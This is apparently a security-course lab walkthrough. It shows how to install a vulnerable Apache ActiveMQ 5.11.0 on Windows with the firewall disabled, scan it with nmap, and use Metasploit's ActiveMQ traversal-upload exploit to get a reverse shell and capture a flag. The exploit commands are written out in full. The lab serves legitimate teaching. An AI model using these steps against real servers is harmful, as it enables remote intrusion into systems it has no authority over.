In the Search results, click "Windows Firewall", the second result in the image below.
In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".
Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.
https://java.comClick the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".
On your Windows system, in Firefox, go to:
https://activemq.apache.org/activemq-5110-releaseDownload the apache-activemq-5.11.0-bin.zip file, as shown below.
Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All..", Extract.
An "apache-activemq-5.11.0-bin" window opens. From its menu bar, click File, "Open Command Prompt".
ActiveMQ starts, showing "ActiveMQ WebConsole available at http://0.0.0.0:8161/" as shown below.
cd apache-activemq-5.11.0 bin\activemq.bat start
Metasploit installs, as shown below.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall
Enter y to install the package.
sudo apt install nmap
Nmap installs, as shown below.
You should see the port open, as shown below.
sudo nmap -sV -p8161 192.168.100.2
It asks if you want to setup a database. Reply no.
At the msf5 > prompt, execute this command:
A list of exploits appears, as shown below.
Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.
The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below,
use exploit/windows/http/apache_activemq_traversal_upload show options
At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:
You get a shell, as shown below. Press Enter to see a Windows prompt.
set RHOSTS 192.168.100.3 set LHOST 192.168.100.1 exploit
H 301.1: Java Module (20 pts)In the shell, execute this command:Find the Module name, which is covered by a green box in the image below. That's the flag.
tasklist /m java*